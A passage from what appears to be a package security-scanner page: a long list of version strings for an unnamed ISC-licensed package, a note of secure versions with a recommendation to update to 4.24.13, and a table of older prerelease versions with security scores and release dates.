"2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.
721 Other Versions
| Version | License | Security | Released | |
|---|---|---|---|---|
| 0.0.0-pr.2857.5130374a | ISC | 10 | 2021-10-13 - 10:15 | over 4 years |
| 0.0.0-pr.3100.1ae9acd0 | ISC | 10 | 2021-11-03 - 14:32 | over 4 years |
| 0.0.0-pr.3101.3d58a27e | ISC | 10 | 2021-11-11 - 10:29 | over 4 years |
| 0.0.0-pr.3288.14260eda | ISC | 10 | 2021-11-27 - 02:02 | over 4 years |
| 0.0.0-pr.4003.e7e3e60a | ISC | 10 | 2022-02-18 - 05:21 | about 4 years |
| 0.0.0-pr.4760.fa6189ff | ISC | 10 | 2022-06-23 - 14:05 | over 3 years |
| 0.0.0-pr.4940.437d4e8a | ISC | 10 | 2022-07-15 - 00:12 | over 3 years |
| 0.0.0-pr.4926.25a4fa9f | ISC | 10 | 2022-07-15 - 00:14 | over 3 years |
| 0.0.0-pr.4970.6ae1561c | ISC | 10 | 2022-07-19 - 21:47 | over 3 years |
| 0.0.0-pr.5763.5e81d58a | ISC | 10 | 2022-11-20 - 09:03 | over 3 years |
| 0.0.0-pr.6004.7d354a3a | ISC | 10 | 2022-12-09 - 11:01 | over 3 years |
| 0.0.0-pr.6007.27c9acfe | ISC | 10 | 2022-12-11 - 13:48 | over 3 years |
| 0.0.0-pr.6029.8f267aea | ISC | 10 | 2022-12-12 - 13:03 | over 3 years |
| 0.0.0-pr.6777.faa4ea2a | ISC | 10 | 2023-02-22 - 01:32 | about 3 years |
| 0.0.0-pr.6777.ae645ec0 | ISC | 10 | 2023-02-24 - 11:26 | about 3 years |
| 0.0.0-pr.7214.998286da | ISC | 10 | 2023-04-11 - 10:03 | almost 3 years |
| 0.0.0-manual.e65faa1c | ISC | 10 | 2023-06-20 - 14:47 | almost 3 years |
| 0.0.0-manual.68f7ce1c | ISC | 10 | 2023-09-28 - 13:59 | over 2 years |
| 0.0.0-manual.c885ac1d | ISC | 10 | 2023-09-29 - 11:31 | over 2 years |
| 0.0.0-pr.8775.a98a849e | ISC | 10 | 2023-10-02 - 02:53 | over 2 years |
| 0.0.0-manual.7264de5f | ISC | 10 | 2023-10-07 - 05:54 | over 2 years |